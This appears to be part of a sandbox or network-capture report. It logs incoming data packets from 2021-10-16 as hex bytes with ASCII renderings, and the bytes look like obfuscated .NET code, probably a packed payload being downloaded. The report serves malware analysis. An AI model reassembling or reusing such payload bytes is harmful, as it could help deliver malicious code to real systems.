2021-10-16 14:53:37 UTC	39	IN	Data Raw: 97 b5 ce 80 d6 b2 6e 91 6a f0 30 f0 94 f0 da e8 ca da 5f f9 78 f2 f3 f2 3d cb 1e cb 95 dd c3 e8 d5 da 5b f9 74 f2 ae f2 26 cb 1c cb 83 dd c4 e8 88 da 4a f9 6e f2 b8 f2 21 cb 14 cb 96 dd db e8 c8 da 5d f9 3b f2 b0 f2 2a cb 0f cb 95 dd cf e8 f4 da 4a f9 6e f2 b8 f2 22 cb 1e cb 81 dd d7 e8 c9 da 5f f9 4d f2 b9 f2 3d cb 14 cb 85 dd d3 e8 f5 da 4a f9 6e f2 b8 f2 26 cb 0f cb 87 dd e6 e8 88 da 00 00 97 0e 3c a4 80 e8 28 a8 9d 71 5d c7 70 8a be 66 c1 f2 44 45 a8 92 7c 0e a1 fa 18 80 90 8a 9d c2 44 89 ef 8d 7c ee c3 e6 ff 7a fc ad 9d 22 6f 6c db a9 8e 91 4f d0 39 57 fd 5b 32 3c d4 6d c2 cf 7d 2f dd 71 27 d8 0c 51 3a b7 18 18 75 62 42 6b 3d 33 b3 58 db a7 d5 cc d3 b6 dd a0 01 3f 5f 5a 4b 49 29 40 db 09 3a 33 07 f3 99 19 c9 93 99 60 9f 81 11 7c 4b fe 0d e0 0c f7 37 Data Ascii: nj0_x=[t&Jn!];*Jn"_M=Jn&<(q]pfDE\|D\|z"olO9W[2<m}/q'Q:ubBk=3X?_ZKI)@:3`\|K7
2021-10-16 14:53:37 UTC	41	IN	Data Raw: 04 7b 0d 01 00 04 2a 32 02 7c 4d 00 00 04 7b 0e 01 00 04 2a 1e 02 7b 3e 00 00 04 2a 22 02 03 7d 3e 00 00 04 2a 32 02 7c 4d 00 00 04 7b 0f 01 00 04 2a 32 02 7c 4d 00 00 04 7b 10 01 00 04 2a 32 02 7c 4d 00 00 04 7b 11 01 00 04 2a 1e 02 7b 3f 00 00 04 2a 22 02 03 7d 3f 00 00 04 2a 1e 02 7b 40 00 00 04 2a 22 02 03 7d 40 00 00 04 2a 32 02 7c 4d 00 00 04 7b 12 01 00 04 2a 1e 02 7b 41 00 00 04 2a 22 02 03 7d 41 00 00 04 2a 1e 02 7b 42 00 00 04 2a 22 02 03 7d 42 00 00 04 2a 32 02 7c 4d 00 00 04 7b 13 01 00 04 2a 1e 02 7b 43 00 00 04 2a 22 02 03 7d 43 00 00 04 2a 1e 02 7b 44 00 00 04 2a 22 02 03 7d 44 00 00 04 2a 32 02 7c 4d 00 00 04 7b 14 01 00 04 2a 1e 02 7b 45 00 00 04 2a 22 02 03 7d 45 00 00 04 2a 1e 02 7b 46 00 00 04 2a 22 02 03 7d 46 00 00 04 2a 1e 02 7b 47 Data Ascii: {2\|M{{>"}>2\|M{2\|M{2\|M{{?"}?{@"}@2\|M{{A"}A{B"}B2\|M{{C"}C{D"}D2\|M{{E"}E{F"}F{G
2021-10-16 14:53:37 UTC	42	IN	Data Raw: 7b b1 00 00 04 7b 72 00 00 04 2a 1e 02 7b a8 00 00 04 2a 32 02 7b b1 00 00 04 7b 73 00 00 04 2a 32 02 7b b1 00 00 04 7b 74 00 00 04 2a 1e 02 7b a9 00 00 04 2a 32 02 7b b1 00 00 04 7b 75 00 00 04 2a 1e 02 7b aa 00 00 04 2a 32 02 7b b1 00 00 04 7b 76 00 00 04 2a 1e 02 7b ab 00 00 04 2a 32 02 7b b1 00 00 04 7b 77 00 00 04 2a 1e 02 7b ac 00 00 04 2a 32 02 7b b1 00 00 04 7b 78 00 00 04 2a 1e 02 7b ad 00 00 04 2a 22 02 03 7d ad 00 00 04 2a 1e 02 7b ae 00 00 04 2a 22 02 03 7d ae 00 00 04 2a 32 02 7b b1 00 00 04 7b 79 00 00 04 2a 32 02 7b b1 00 00 04 7b 7a 00 00 04 2a 32 02 7b b1 00 00 04 7b 7b 00 00 04 2a 32 02 7b b1 00 00 04 7b 7c 00 00 04 2a 32 02 7b b1 00 00 04 7b 7d 00 00 04 2a 52 02 16 7d b2 00 00 04 02 02 7b b2 00 00 04 28 fa 01 00 06 2a 1e 02 7b b4 00 00 Data Ascii: {{r{2{{s2{{t{2{{u{2{{v{2{{w{2{{x{"}{"}2{{y2{{z2{{{2{{\|2{{}R}{({
2021-10-16 14:53:37 UTC	43	IN	Data Raw: 7b 29 01 00 04 7b a0 00 00 04 2a 32 02 7b 29 01 00 04 7b a1 00 00 04 2a 1e 02 7b 25 01 00 04 2a 1e 02 7b 26 01 00 04 2a 1e 02 7b 27 01 00 04 2a 32 02 7b 29 01 00 04 7b a2 00 00 04 2a 32 02 7b 29 01 00 04 7b a3 00 00 04 2a a6 02 28 3f 00 00 0a 02 02 fe 06 1f 03 00 06 73 40 00 00 0a 20 a4 00 00 00 20 94 00 00 00 28 28 00 00 2b 02 28 23 03 00 06 2a 06 2a 1e 02 7b 2a 01 00 04 2a d2 02 73 e9 02 00 06 7d 57 01 00 04 02 28 3f 00 00 0a 02 02 fe 06 2e 03 00 06 73 40 00 00 0a 20 fa 01 00 00 20 ca 01 00 00 28 28 00 00 2b 02 28 49 03 00 06 2a 42 20 e1 00 00 00 20 94 00 00 00 28 9c 01 00 06 2a 1e 02 7b 51 01 00 04 2a 22 02 03 7d 51 01 00 04 2a 32 02 7b 57 01 00 04 7b 19 01 00 04 2a 1e 02 7b 52 01 00 04 2a 22 02 03 7d 52 01 00 04 2a 1e 02 7b 53 01 00 04 2a 22 02 03 7d Data Ascii: {){2{){{%{&{'2{){2{){(?s@ ((+(#{s}W(?.s@ ((+(IB ({Q"}Q2{W{{R"}R{S*"}
2021-10-16 14:53:37 UTC	45	IN	Data Raw: 6f 1e 00 00 0a 0b 1f 0a 13 05 38 75 ff ff ff 06 17 58 0a 20 3f 02 00 00 0d 20 48 02 00 00 0c 20 b0 0d 00 00 08 09 1c 5a 59 30 08 16 13 05 38 51 ff ff ff 1c 2b f6 11 07 20 86 00 00 00 93 20 15 47 00 00 59 13 05 38 39 ff ff ff 07 75 3b 00 00 01 2a 1f 09 13 05 38 29 ff ff ff 00 13 30 08 00 ca 00 00 00 05 00 00 11 2b 42 11 04 45 0c 00 00 00 0b 00 00 00 75 00 00 00 00 00 00 00 6d 00 00 00 88 00 00 00 5f 00 00 00 36 00 00 00 86 00 00 00 75 00 00 00 75 00 00 00 2f 00 00 00 13 00 00 00 d0 06 00 00 06 26 16 13 04 2b be 16 0a 1f 0b 13 04 2b b6 0e 08 0e 09 61 1f 48 59 06 61 45 01 00 00 00 06 00 00 00 1f 0a 13 04 2b 9d 1c 2b f9 14 0b 1b 13 04 2b 93 02 8c 03 00 00 1b 03 8c 02 00 00 1b 04 8c 01 00 00 1b 05 0e 04 0e 05 0e 06 0e 07 28 1f 00 00 0a 0b 1b 13 04 38 6a ff ff Data Ascii: o8uX ? H ZY08Q+ GY89u;*8)0+BEum_6uu/&++aHYaE+++(8j
2021-10-16 14:53:37 UTC	46	IN	Data Raw: 00 00 d0 15 00 00 02 28 2a 00 00 0a 19 28 60 02 00 06 73 30 00 00 0a 7a 02 02 7c 07 00 00 04 28 16 00 00 2b 2a 00 00 13 30 04 00 90 00 00 00 0e 00 00 11 7e b0 00 00 04 0c 16 0b 07 45 09 00 00 00 00 00 00 00 24 00 00 00 5d 00 00 00 51 00 00 00 12 00 00 00 31 00 00 00 31 00 00 00 24 00 00 00 5d 00 00 00 03 02 7b 08 00 00 04 fe 01 2c 04 1a 0b 2b c7 17 2b fa 08 20 66 01 00 00 91 08 20 9f 00 00 00 91 59 0b 2b b2 03 14 fe 03 2c 04 1b 0b 2b a8 19 2b fa 20 eb 13 cd 7e 20 97 00 00 00 d0 01 00 00 02 28 2a 00 00 0a 1c 28 60 02 00 06 73 30 00 00 0a 7a 02 02 7c 08 00 00 04 28 17 00 00 2b 2a 13 30 04 00 79 00 00 00 0d 00 00 11 16 0b 07 45 09 00 00 00 00 00 00 00 16 00 00 00 40 00 00 00 4c 00 00 00 4c 00 00 00 12 00 00 00 12 00 00 00 23 00 00 00 23 00 00 00 03 02 7b 09 Data Ascii: ((`s0z\|(+0~E$]Q11$]{,++ f Y+,++ ~ ((`s0z\|(+0yE@LL##{
2021-10-16 14:53:37 UTC	47	IN	Data Raw: 00 00 03 02 7b 11 00 00 04 fe 01 2c 04 1c 0b 2b c7 19 2b fa 1b 0b 2b c0 03 14 fe 03 2c 04 1d 0b 2b b6 16 2b fa 20 eb 13 cd 7e 20 e6 00 00 00 d0 03 00 00 02 28 2a 00 00 0a 1c 28 60 02 00 06 73 30 00 00 0a 7a 02 02 7c 11 00 00 04 28 20 00 00 2b 2a 13 30 06 00 95 00 00 00 0d 00 00 11 1a 0b 07 45 09 00 00 00 3f 00 00 00 00 00 00 00 68 00 00 00 3f 00 00 00 00 00 00 00 5c 00 00 00 5c 00 00 00 12 00 00 00 16 00 00 00 03 02 7b 12 00 00 04 fe 01 2c 04 1d 0b 2b c7 1e 2b fa 18 0b 2b c0 03 14 fe 03 7e 5e 01 00 04 1f 59 7e 5e 01 00 04 1f 59 93 7e 5e 01 00 04 1f 7f 93 61 1f 0c 5f 9d 2c 04 16 0b 2b 9a 1c 2b fa 20 ec 13 cd 7e 1f 26 d0 01 00 00 02 28 2a 00 00 0a 17 28 60 02 00 06 73 30 00 00 0a 7a 02 02 7c 12 00 00 04 28 21 00 00 2b 2a 00 00 00 13 30 04 00 79 00 00 00 0d Data Ascii: {,+++,++ ~ ((`s0z\|( +0E?h?\\{,+++~^Y~^Y~^a_,++ ~&((`s0z\|(!+0y
2021-10-16 14:53:37 UTC	49	IN	Data Raw: 2a 38 1c ff ff ff 00 00 00 13 30 02 00 af 00 00 00 05 00 00 11 2b 43 11 04 45 0c 00 00 00 13 00 00 00 0c 00 00 00 6c 00 00 00 34 00 00 00 46 00 00 00 2e 00 00 00 2c 00 00 00 64 00 00 00 00 00 00 00 0c 00 00 00 46 00 00 00 6e 00 00 00 d0 38 00 00 06 26 1f 09 13 04 2b bd 16 0a 16 13 04 2b b6 03 04 61 1f 58 59 06 61 45 01 00 00 00 05 00 00 00 1c 13 04 2b a0 19 2b f9 14 0b 1f 0a 13 04 2b 95 02 8c 02 00 00 1b 6f 34 00 00 0a 0b 1f 0a 13 04 2b 83 06 17 58 0a 20 1d 07 00 00 0c 08 25 5a 08 58 18 5d 2c 08 1d 13 04 38 68 ff ff ff 18 2b f6 16 13 04 38 5d ff ff ff 07 2a 16 13 04 38 53 ff ff ff 00 13 30 07 00 e8 00 00 00 12 00 00 11 2b 42 11 04 45 0c 00 00 00 33 00 00 00 12 00 00 00 53 00 00 00 a7 00 00 00 67 00 00 00 57 00 00 00 2c 00 00 00 33 00 00 00 0b 00 00 00 5f Data Ascii: 80+CEl4F.,dFn8&++aXYaE+++o4+X %ZX],8h+8]8S0+BE3SgW,3_
2021-10-16 14:53:37 UTC	50	IN	Data Raw: 00 00 1b 6f 3a 00 00 0a 06 17 58 0a 04 25 5a 0b 04 07 58 0b 19 0d 2b 8e 07 18 5d 2d 04 17 0d 2b 85 1c 2b fa 2a 18 13 05 11 05 45 05 00 00 00 06 00 00 00 07 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 d0 3f 00 00 06 26 2a 2b 8e 13 30 02 00 a7 00 00 00 15 00 00 11 2b 40 09 45 0c 00 00 00 30 00 00 00 67 00 00 00 41 00 00 00 00 00 00 00 58 00 00 00 60 00 00 00 41 00 00 00 30 00 00 00 0a 00 00 00 00 00 00 00 2a 00 00 00 11 00 00 00 d0 40 00 00 06 26 1e 0d 2b c0 16 0a 1f 0b 0d 2b b9 05 04 61 1f 29 59 06 61 45 01 00 00 00 05 00 00 00 1f 0a 0d 2b a3 16 2b fa 14 0b 1c 0d 2b 9a 02 8c 02 00 00 1b 03 6f 3b 00 00 0a 0b 1c 0d 2b 89 06 17 58 0a 04 25 5a 04 58 18 5d 2c 07 1a 0d 38 75 ff ff ff 1b 2b f7 1f 0b 0d 38 6a ff ff ff 07 75 0a 00 00 01 2a 1f 0b 0d 38 5b ff ff ff Data Ascii: o:X%ZX+]-++E?&+0+@E0gAX`A0@&++a)YaE+++o;+X%ZX],8u+8ju8[
2021-10-16 14:53:37 UTC	51	IN	Data Raw: 00 00 2b 13 06 11 06 2d 08 17 13 0a 38 75 fe ff ff 1f 0a 2b f5 14 13 05 11 04 75 1f 00 00 01 20 87 01 00 00 20 be 01 00 00 28 33 00 00 2b 11 0b 20 8c 00 00 00 93 20 da 32 00 00 59 13 0a 38 43 fe ff ff 08 75 3a 00 00 01 07 74 49 00 00 01 20 b8 01 00 00 20 b2 01 00 00 28 2b 00 00 2b 08 74 3a 00 00 01 20 51 13 cd 7e 1f 72 d0 1d 00 00 02 28 2a 00 00 0a 1e 28 60 02 00 06 20 bf 03 00 00 20 87 03 00 00 28 2d 00 00 2b 18 13 0a 38 f4 fd ff ff 08 74 3a 00 00 01 6f 44 00 00 0a 13 04 11 04 75 1f 00 00 01 13 07 19 13 0a 38 d6 fd ff ff 02 6f 59 00 00 06 6f 45 00 00 0a 11 07 74 1f 00 00 01 19 6f 46 00 00 0a 28 47 00 00 0a 6f 48 00 00 0a 26 19 13 0a 38 ab fd ff ff 11 07 74 1f 00 00 01 6f 49 00 00 0a 13 08 11 08 2d 09 1f 0f 13 0a 38 90 fd ff ff 1f 09 2b f5 14 13 07 11 04 Data Ascii: +-8u+u (3+ 2Y8Cu:tI (++t: Q~r(*(` (-+8t:oDu8oYoEtoF(GoH&8toI-8+
2021-10-16 14:53:37 UTC	53	IN	Data Raw: 00 01 13 30 05 00 96 01 00 00 0d 00 00 11 17 0b 07 45 0b 00 00 00 a0 00 00 00 00 00 00 00 69 00 00 00 33 00 00 00 31 01 00 00 cd 00 00 00 61 01 00 00 55 01 00 00 4e 01 00 00 a0 00 00 00 fb 00 00 00 02 6f 75 00 00 06 20 19 12 cd 7e 20 a1 00 00 00 d0 17 00 00 02 28 2a 00 00 0a 1e 28 60 02 00 06 20 18 03 00 00 20 28 03 00 00 28 37 00 00 2b 19 0b 2b 9b 02 6f 55 00 00 06 20 12 12 cd 7e 20 db 00 00 00 d0 23 00 00 02 28 2a 00 00 0a 19 28 60 02 00 06 20 66 03 00 00 20 0c 03 00 00 28 38 00 00 2b 18 0b 38 65 ff ff ff 02 6f 57 00 00 06 20 10 12 cd 7e 20 b8 00 00 00 d0 01 00 00 02 28 2a 00 00 0a 17 28 60 02 00 06 20 a4 01 00 00 20 94 01 00 00 28 37 00 00 2b 1f 09 0b 38 2e ff ff ff 02 6f 59 00 00 06 20 19 12 cd 7e 1f 43 d0 05 00 00 02 28 2a 00 00 0a 1e 28 60 02 00 06 Data Ascii: 0Ei31aUNou ~ ((` ((7++oU ~ #((` f (8+8eoW ~ ((` (7+8.oY ~C((`
2021-10-16 14:53:37 UTC	54	IN	Data Raw: 06 20 45 01 00 00 20 06 01 00 00 28 3f 00 00 2b a2 25 1c 20 83 11 cd 7e 1f 55 d0 1a 00 00 02 28 2a 00 00 0a 1a 28 60 02 00 06 a2 25 1d 02 6f 59 00 00 06 20 3f 02 00 00 20 04 02 00 00 28 34 00 00 2b a2 25 1e 20 85 11 cd 7e 20 c1 00 00 00 d0 1d 00 00 02 28 2a 00 00 0a 18 28 60 02 00 06 a2 25 1f 09 02 6f 5b 00 00 06 20 93 03 00 00 20 d0 03 00 00 28 3f 00 00 2b a2 25 1f 0a 20 8f 11 cd 7e 1f 12 d0 0b 00 00 02 28 2a 00 00 0a 1e 28 60 02 00 06 a2 25 1f 0b 02 6f 5d 00 00 06 20 c6 02 00 00 20 fa 02 00 00 28 40 00 00 2b a2 25 1f 0c 20 b1 11 cd 7e 20 cc 00 00 00 d0 1f 00 00 02 28 2a 00 00 0a 1e 28 60 02 00 06 a2 20 33 03 00 00 20 42 03 00 00 28 2e 02 00 06 20 7a 03 00 00 20 42 03 00 00 28 2d 00 00 2b 17 13 0a 38 1e fe ff ff 09 75 3a 00 00 01 1f 7c 1e 28 41 00 00 2b Data Ascii: E (?+% ~U((`%oY ? (4+% ~ ((`%o[ (?+% ~((`%o] (@+% ~ ((` 3 B(. z B(-+8u:\|(A+
2021-10-16 14:53:37 UTC	55	IN	Data Raw: 2a 02 00 00 1f 00 00 11 1b 13 06 11 06 45 08 00 00 00 2a 00 00 00 a0 01 00 00 a8 01 00 00 ec 01 00 00 ff 01 00 00 00 00 00 00 f4 01 00 00 65 00 00 00 02 6f 73 00 00 06 20 3f 02 00 00 20 67 02 00 00 28 29 00 00 2b 20 99 02 00 00 20 f8 02 00 00 28 2a 00 00 2b 0a 16 13 06 2b af 06 74 3b 00 00 01 73 42 00 00 0a 0b 73 43 00 00 0a 0c 73 43 00 00 0a 0d 08 75 3a 00 00 01 07 74 49 00 00 01 20 6f 01 00 00 20 65 01 00 00 28 2b 00 00 2b 1d 13 06 38 74 ff ff ff 07 75 49 00 00 01 20 71 03 00 00 20 0e 03 00 00 28 2c 00 00 2b 08 74 3a 00 00 01 1f 0b 8d 3b 00 00 01 25 16 20 28 11 cd 7e 1f 7b d0 28 00 00 02 28 2a 00 00 0a 1a 28 60 02 00 06 a2 25 17 02 6f 75 00 00 06 20 d5 03 00 00 20 96 03 00 00 28 3f 00 00 2b a2 25 18 20 7d 11 cd 7e 1f 40 d0 22 00 00 02 28 2a 00 00 0a 1a Data Ascii: Eeos ? g()+ (++t;sBsCsCu:tI o e(++8tuI q (,+t:;% (~{(((`%ou (?+% }~@"(*
2021-10-16 14:53:37 UTC	57	IN	Data Raw: 2b 1c 13 0d 38 9d fe ff ff 02 6f 5b 00 00 06 11 06 74 1f 00 00 01 1a 1f 53 1f 67 28 30 00 00 2b 20 f5 02 00 00 20 94 02 00 00 28 2a 00 00 2b 20 40 01 00 00 20 70 01 00 00 28 37 00 00 2b 1d 13 0d 38 60 fe ff ff 02 6f 5d 00 00 06 11 06 74 1f 00 00 01 1b 20 9e 03 00 00 20 aa 03 00 00 28 30 00 00 2b 20 92 02 00 00 20 f3 02 00 00 28 2a 00 00 2b 1f 2b 1f 12 28 39 00 00 2b 16 13 0d 38 23 fe ff ff 14 13 06 11 05 74 1f 00 00 01 6f 4a 00 00 0a de 21 25 28 4e 00 00 0a 13 07 11 07 74 40 00 00 01 6f 39 00 00 0a 28 52 00 00 0a 26 28 4f 00 00 0a de 00 1f 0b 13 0f 11 0f 45 0e 00 00 00 17 01 00 00 66 00 00 00 00 00 00 00 c2 00 00 00 3b 00 00 00 66 00 00 00 07 01 00 00 5d 00 00 00 f3 00 00 00 5d 00 00 00 0f 01 00 00 00 00 00 00 4c 00 00 00 c2 00 00 00 20 dc 10 cd 7e 1f 2e Data Ascii: +8o[tSg(0+ (+ @ p(7+8`o]t (0+ (++(9+8#toJ!%(Nt@o9(R&(OEf;f]]L ~.
2021-10-16 14:53:37 UTC	58	IN	Data Raw: 00 00 00 00 00 00 13 01 00 00 c5 01 00 00 d8 02 00 00 21 00 00 00 40 00 00 01 1b 30 08 00 0b 05 00 00 22 00 00 11 7e b0 00 00 04 13 1c 18 13 17 11 17 45 07 00 00 00 00 00 00 00 18 00 00 00 00 00 00 00 1f 00 00 00 12 00 00 00 00 00 00 00 1f 00 00 00 02 8e 69 17 da 17 d6 8d 3b 00 00 01 0b 1a 13 17 2b cb 02 8e 69 17 da 0c 16 0d 38 c4 01 00 00 1d 13 19 11 19 45 0a 00 00 00 ed 00 00 00 de 00 00 00 bb 00 00 00 00 00 00 00 10 01 00 00 36 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 de 00 00 00 20 f5 17 cd 7e 1f 41 d0 29 00 00 02 28 2a 00 00 0a 1b 28 60 02 00 06 1b 8d 01 00 00 01 25 16 20 e4 17 cd 7e 1f 69 d0 22 00 00 02 28 2a 00 00 0a 18 28 60 02 00 06 a2 25 17 20 1c 17 cd 7e 20 ed 00 00 00 d0 1d 00 00 02 28 2a 00 00 0a 1b 28 60 02 00 06 a2 25 18 20 19 17 cd 7e Data Ascii: !@0"~Ei;+i8E6 ~A)((`% ~i"((`% ~ (*(`% ~
2021-10-16 14:53:37 UTC	59	IN	Data Raw: 00 ff 03 00 00 49 00 00 00 00 00 00 00 00 00 00 00 60 02 00 00 08 02 00 00 68 04 00 00 0f 00 00 00 40 00 00 01 00 00 00 00 07 00 00 00 c7 04 00 00 ce 04 00 00 0f 00 00 00 40 00 00 01 13 30 03 00 3a 00 00 00 23 00 00 11 19 0c 08 45 05 00 00 00 11 00 00 00 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 7c 19 00 00 04 25 0a 06 4a 17 d6 54 16 0c 2b d5 02 02 7b 19 00 00 04 28 4e 00 00 06 2a 00 00 13 30 03 00 3a 00 00 00 23 00 00 11 19 0c 08 45 05 00 00 00 0d 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 11 00 00 00 02 7c 19 00 00 04 25 0a 06 4a 17 da 54 18 0c 2b d5 02 02 7b 19 00 00 04 28 4e 00 00 06 2a 00 00 13 30 04 00 5e 00 00 00 0d 00 00 11 17 0b 07 45 05 00 00 00 00 00 00 00 00 00 00 00 35 00 00 00 00 00 00 00 00 00 00 00 02 02 7c 26 00 00 04 7b 91 00 Data Ascii: I`h@@0:#E\|%JT+{(N0:#E\|%JT+{(N0^E5\|&{
2021-10-16 14:53:37 UTC	61	IN	Data Raw: 23 00 00 00 3e 00 00 00 02 fe 06 4c 00 00 06 73 40 00 00 0a 0a 02 7b 1f 00 00 04 0b 07 74 10 00 00 01 2c 04 1c 0d 2b ba 1d 2b fa 07 75 10 00 00 01 06 74 3d 00 00 01 20 b7 03 00 00 20 d6 03 00 00 28 51 00 00 2b 02 03 7d 1f 00 00 04 02 7b 1f 00 00 04 0b 07 75 10 00 00 01 2c 04 16 0d 2b 82 1a 2b fa 07 74 10 00 00 01 06 74 3d 00 00 01 6f 63 00 00 0a 2a 00 00 00 13 30 04 00 be 00 00 00 2b 00 00 11 16 13 04 11 04 45 09 00 00 00 00 00 00 00 8f 00 00 00 29 00 00 00 7e 00 00 00 44 00 00 00 7e 00 00 00 7e 00 00 00 7e 00 00 00 6b 00 00 00 02 fe 06 4b 00 00 06 73 40 00 00 0a 0a 02 7c 26 00 00 04 7b 94 00 00 04 0b 07 75 10 00 00 01 2c 05 18 13 04 2b af 1a 2b f9 07 74 10 00 00 01 06 75 3d 00 00 01 20 27 01 00 00 20 46 01 00 00 28 51 00 00 2b 02 03 0c 7c 26 00 00 04 08 Data Ascii: #>Ls@{t,++ut= (Q+}{u,++tt=oc*0+E)~D~~~kKs@\|&{u,++tu= ' F(Q+\|&
2021-10-16 14:53:37 UTC	62	IN	Data Raw: 00 44 00 00 00 63 00 00 00 02 fe 06 48 00 00 06 73 40 00 00 0a 0a 02 7c 26 00 00 04 7b 9a 00 00 04 0b 07 74 10 00 00 01 2c 05 19 13 04 2b af 1d 2b f9 07 74 10 00 00 01 06 74 3d 00 00 01 20 d0 02 00 00 20 b1 02 00 00 28 51 00 00 2b 02 03 0c 7c 26 00 00 04 08 74 10 00 00 01 7d 9a 00 00 04 02 7c 26 00 00 04 7b 9a 00 00 04 0b 1a 13 04 38 6a ff ff ff 07 75 10 00 00 01 2c 08 1b 13 04 38 5a ff ff ff 18 2b f6 07 74 10 00 00 01 06 74 3d 00 00 01 6f 63 00 00 0a 2a 00 00 13 30 04 00 99 00 00 00 32 00 00 11 17 13 04 11 04 45 08 00 00 00 2a 00 00 00 00 00 00 00 6e 00 00 00 1c 00 00 00 6e 00 00 00 50 00 00 00 0c 00 00 00 17 00 00 00 02 7c 26 00 00 04 7b 9b 00 00 04 0b 07 2c 05 1d 13 04 2b c5 19 2b f9 1a 13 04 2b bd 02 17 0c 7c 26 00 00 04 08 7d 9b 00 00 04 20 58 17 cd Data Ascii: DcHs@\|&{t,++tt= (Q+\|&t}\|&{8ju,8Z+tt=oc02EnnP\|&{,+++\|&} X
2021-10-16 14:53:37 UTC	63	IN	Data Raw: 01 13 13 11 13 2c 09 1f 2b 13 17 38 ea fb ff ff 1f 21 2b f5 02 04 74 10 00 00 01 6f 7c 00 00 06 1f 12 13 17 38 d1 fb ff ff 03 1f 15 fe 01 13 14 11 14 2c 09 1f 28 13 17 38 bd fb ff ff 1f 1e 2b f5 02 04 74 10 00 00 01 6f 7e 00 00 06 1f 12 13 17 38 a4 fb ff ff 02 17 13 15 7c 26 00 00 04 11 15 7d 9b 00 00 04 1f 12 13 17 38 8b fb ff ff 2a 00 00 13 30 02 00 c3 00 00 00 34 00 00 11 2b 44 09 45 0d 00 00 00 4c 00 00 00 80 00 00 00 7e 00 00 00 0a 00 00 00 00 00 00 00 77 00 00 00 10 00 00 00 77 00 00 00 38 00 00 00 0a 00 00 00 4c 00 00 00 60 00 00 00 31 00 00 00 d0 81 00 00 06 26 19 0d 2b bc 16 0a 1c 0d 2b b6 03 04 61 1f 2a 59 06 61 45 02 00 00 00 05 00 00 00 08 00 00 00 1f 0c 0d 2b 9c 1e 2b fa 1f 0a 2b f6 1a 0b 1f 0b 0d 2b 8e 02 8c 02 00 00 1b 28 65 00 00 0a 0b 1f Data Ascii: ,+8!+to\|8,(8+to~8\|&}804+DEL~ww8L`1&++aYaE++++(e
2021-10-16 14:53:37 UTC	65	IN	Data Raw: 02 00 00 28 37 00 00 2b 1f 0b 13 0c 38 a9 fe ff ff 02 6f b7 00 00 06 11 06 74 1f 00 00 01 1a 20 df 00 00 00 20 eb 00 00 00 28 30 00 00 2b 1f 41 1f 20 28 2a 00 00 2b 20 a3 03 00 00 20 93 03 00 00 28 37 00 00 2b 1d 13 0c 38 6c fe ff ff 02 6f 8d 00 00 06 11 06 75 1f 00 00 01 1b 20 60 02 00 00 20 54 02 00 00 28 30 00 00 2b 20 1d 01 00 00 20 7c 01 00 00 28 2a 00 00 2b 20 d9 00 00 00 20 e9 00 00 00 28 37 00 00 2b 16 13 0c 38 29 fe ff ff 02 6f 91 00 00 06 11 06 74 1f 00 00 01 1c 20 50 02 00 00 20 64 02 00 00 28 30 00 00 2b 28 4d 00 00 0a 6f 3a 00 00 0a 1f 10 13 0c 38 f9 fd ff ff 02 6f 8b 00 00 06 11 06 75 1f 00 00 01 1d 6f 46 00 00 0a 28 4d 00 00 0a 6f 3a 00 00 0a 1a 13 0c 38 d4 fd ff ff 02 6f bb 00 00 06 11 06 75 1f 00 00 01 1e 6f 46 00 00 0a 28 4d 00 00 0a 6f Data Ascii: (7+8ot (0+A (+ (7+8lou ` T(0+ \|(+ (7+8)ot P d(0+(Mo:8ouoF(Mo:8ouoF(Mo
2021-10-16 14:53:37 UTC	66	IN	Data Raw: 00 28 37 00 00 2b 18 13 0c 38 96 fe ff ff 02 6f b7 00 00 06 11 06 74 1f 00 00 01 1a 20 a7 01 00 00 20 93 01 00 00 28 30 00 00 2b 20 81 01 00 00 20 e0 01 00 00 28 2a 00 00 2b 20 2e 02 00 00 20 1e 02 00 00 28 37 00 00 2b 19 13 0c 38 53 fe ff ff 02 6f 8d 00 00 06 11 06 74 1f 00 00 01 1b 20 b5 02 00 00 20 81 02 00 00 28 30 00 00 2b 20 11 02 00 00 20 70 02 00 00 28 2a 00 00 2b 20 24 01 00 00 20 14 01 00 00 28 37 00 00 2b 1f 0b 13 0c 38 0f fe ff ff 02 6f 91 00 00 06 11 06 74 1f 00 00 01 1c 20 e6 01 00 00 20 d2 01 00 00 28 30 00 00 2b 28 4d 00 00 0a 6f 3a 00 00 0a 1f 0c 13 0c 38 df fd ff ff 02 6f 8b 00 00 06 11 06 75 1f 00 00 01 1d 6f 46 00 00 0a 28 4d 00 00 0a 6f 3a 00 00 0a 1f 09 13 0c 38 b9 fd ff ff 02 6f bb 00 00 06 11 06 75 1f 00 00 01 1e 6f 46 00 00 0a 28 Data Ascii: (7+8ot (0+ (+ . (7+8Sot (0+ p(+ $ (7+8ot (0+(Mo:8ouoF(Mo:8ouoF(
2021-10-16 14:53:37 UTC	67	IN	Data Raw: 06 75 45 00 00 01 20 fb 02 00 00 20 c8 02 00 00 28 54 00 00 2b 02 03 7d 4a 00 00 04 02 7b 4a 00 00 04 0b 07 74 0f 00 00 01 2c 04 19 0d 2b 82 1d 2b fa 07 75 0f 00 00 01 06 74 45 00 00 01 6f 6a 00 00 0a 7e b0 00 00 04 20 ef 00 00 00 7e b0 00 00 04 20 ef 00 00 00 91 7e b0 00 00 04 1f 0a 91 61 20 86 00 00 00 5f 9c 2a 00 00 13 30 02 00 14 00 00 00 09 00 00 11 02 03 0a 7c 4d 00 00 04 06 75 10 00 00 01 7d 15 01 00 04 2a 13 30 02 00 14 00 00 00 2d 00 00 11 02 03 0a 7c 4d 00 00 04 06 75 10 00 00 01 7d 16 01 00 04 2a 13 30 02 00 14 00 00 00 09 00 00 11 02 03 0a 7c 4d 00 00 04 06 75 10 00 00 01 7d 17 01 00 04 2a 13 30 02 00 14 00 00 00 2d 00 00 11 02 03 0a 7c 4d 00 00 04 06 74 10 00 00 01 7d 18 01 00 04 2a 13 30 04 00 94 00 00 00 3b 00 00 11 7e b0 00 00 04 13 04 16 Data Ascii: uE (T+}J{Jt,++utEoj~ ~ ~a _0\|Mu}0-\|Mu}0\|Mu}0-\|Mt}*0;~
